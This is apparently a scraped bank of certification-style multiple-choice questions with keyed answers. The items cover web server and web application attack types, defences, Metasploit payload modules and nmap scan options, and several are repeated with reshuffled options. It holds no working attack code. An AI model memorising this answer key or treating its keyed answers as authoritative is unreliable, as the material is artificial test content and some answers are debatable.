In which layer of the web application vulnerability stack does an attacker exploit business-logic flaws and technical vulnerabilities to perform input validation attacks such as XSS? - Layer 4 - Layer 5 - Layer 7 - Layer 6
Layer 7
Which of the following vulnerabilities occurs when an application adds files without the proper validation of inputs, thereby enabling an attacker to modify the input and embed path traversal characters? - Security misconfiguration - File fingerprinting - Local file inclusion - Fileless malware
Local file inclusion
In which of the following attacks does an attacker attempt to access sensitive information by intercepting and altering communications between an end user and a web server? - Man-in-the-middle attack - HTTP response splitting attack - Phishing attack - Website defacement attack
Man-in-the-middle attack
Which of the following attacks allows an attacker to access sensitive information by intercepting and altering communications between an end user and webservers? - Man-in-the-middle attack - HTTP response splitting attack - Directory traversal attack - DoS attack
Man-in-the-middle attack
Which of the following is not a webserver security tool? - Fortify Web - InspectNetIQ secure configuration manager - Netcraft - Retina CS
Netcraft
Which of the following is an attack that can majorly affect web applications, including the basic level of service, and allows a level of privilege that standard HTTP application methods cannot grant? - Platform exploits - CAPTCHA attacks - Buffer overflow - Network access attacks
Network access attacks
Which of the following is a lookup database for default passwords, credentials, and ports? - NetcraftN - Collector Studio - Open Sez Me - ID Serve
Open Sez Me
Which of the following guidelines should be followed by application developers to defend against HTTP response-splitting attacks? - Use the same TCP connection with the proxy for different virtual hosts - Allow CR (%0d or \r) and LF (%0a or \n) characters - Parse all user inputs or other forms of encoding before using them in HTTP headers - Share incoming TCP connections among different clients
Parse all user inputs or other forms of encoding before using them in HTTP headers
Andrew, a software developer in CyberTech organization has released a security update that acts as defensive technique against the vulnerabilities in the software product the company has released earlier. Identify the technique used by Andrew to resolve the software vulnerabilities? - Patch Management - Product Management - Risk Management - Vulnerability Management
Patch Management
Which of the following teams has the responsibility to check for updates and patches regularly? - Vulnerability assessment team - Red team - Patch management team - Security software development team
Patch management team
Attackers use GET and CONNECT requests to use vulnerable web servers as which of the following? - Application servers - DNS servers - None of the above - Proxies
Proxies
An attacker exploits a web application by tampering with the form and parameter of the web application and he is successful in exploiting the web application and gaining access. Which type of vulnerability did the attacker exploit? - Security misconfiguration - SQL injection - Sensitive data exposure - Broken access control
Security misconfiguration
Which of the following attacks allows an attacker to inject malicious content, modify the user´s online experience, and obtain unauthorized information? - Session prediction - Session poisoning - Cross-site request forgery - Session brute-forcing
Session poisoning
Which of the following types of payload modules in the Metasploit framework is self-contained and completely stand-alone? - Stages - Exploit - Singles - Stagers
Singles
During a penetration test, a tester finds that the web application being analyzed is vulnerable to XSS. Which of the following conditions must be met to exploit this vulnerability? - The web application does not have the secure flag set. - The victim's browser must have ActiveX technology enabled. - The victim user should not have an endpoint security solution. - The session cookies do not have the HttpOnly flag set.
The session cookies do not have the HttpOnly flag set.
Which of the following technique defends servers against blind response forgery? - UDP source port randomization - Disallow carriage return (%0d or \r) and line feed (%0a or \n) characters - Removal of carriage returns (CRs) and linefeeds (LFs) - Restriction of web application access to unique IPs
UDP source port randomization
Which of the following technique defends servers against blind response forgery? - UDP source port randomization - Removal of carriage returns (CRs) and linefeeds (LFs) - Disallow carriage return (%0d or \r) and line feed (%0a or \n) characters - Restriction of web application access to unique IPs
UDP source port randomization
A network administrator has observed that the computers in his network have Windows 7 operating system. The administrator has learned that the WannaCry ransomeware is affecting Windows 7 Systems across the globe. Which of the following is the best option that the network administrator has to provide efficient security and defend his network? - Remove all Windows 7 machines from the network - Update security patches and fixes provided by Microsoft - Conduct vulnerability assessment of all the machines in the network - Perform penetration testing on all the machines in the network
Update security patches and fixes provided by Microsoft
Which of the following techniques is used by an attacker to enumerate usernames from a target web application? - Verbose failure message - Dictionary attack - Cookie poisoning - Bypass SAML-based SSO
Verbose failure message
Identify the component of the web server that provides storage on a different machine or a disk after the original disk is filled-up? - Virtual document tree - Server root - Virtual hosting - Document root
Virtual document tree
Which of the following is a web-server component that provides storage on a different machine or disk after the original disk is filled up? - Document root - Server root - Virtual hosting - Virtual document tree
Virtual document tree
Which of the following provides storage on a different machine or disk after the original disk is filled up? - Virtual Hosting - Document root - Virtual document tree - Server root
Virtual document tree
Which of the following components of the web service architecture is an extension of SOAP and can be used to maintain the integrity and confidentiality of SOAP messages? - WS-Security - WS-Policy - WSDL - UDDI
WS-Security
Which of the following provides an interface between end-users and webservers? - Firewall - Database - Demilitarized zone - Web applications
Web applications
Which of the following layers in the web application architecture contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component? - Web-server logic layer - Business logic layer - Client or presentation layer - Database layer
Web-server logic layer
In which of the following attack types does an attacker alter the visual appearance of a web page by injecting code to add image popups or text? - Web cache poisoning - Server-side request forgery - Website defacement - Web-server misconfiguration
Website defacement
Which of the following attacks occurs when an intruder maliciously alters the visual appearance of a webpage by inserting or substituting provocative, and frequently, offending data? - Directory traversal attack - Website defacement - Man-in-the-middle attack - HTTP response splitting attack
Website defacement
Which technology do SOAP services use to format information? - XML - SATA - PCI - ISDN
XML
Which of the following commands does an attacker use to detect HTTP Trace? - nmap -p80 --script http-userdir -enum localhost - nmap --script http-enum -p80 <host> - nmap --script hostmap <host> - nmap -p80 --script http-trace <host>
nmap -p80 --script http-trace <host>
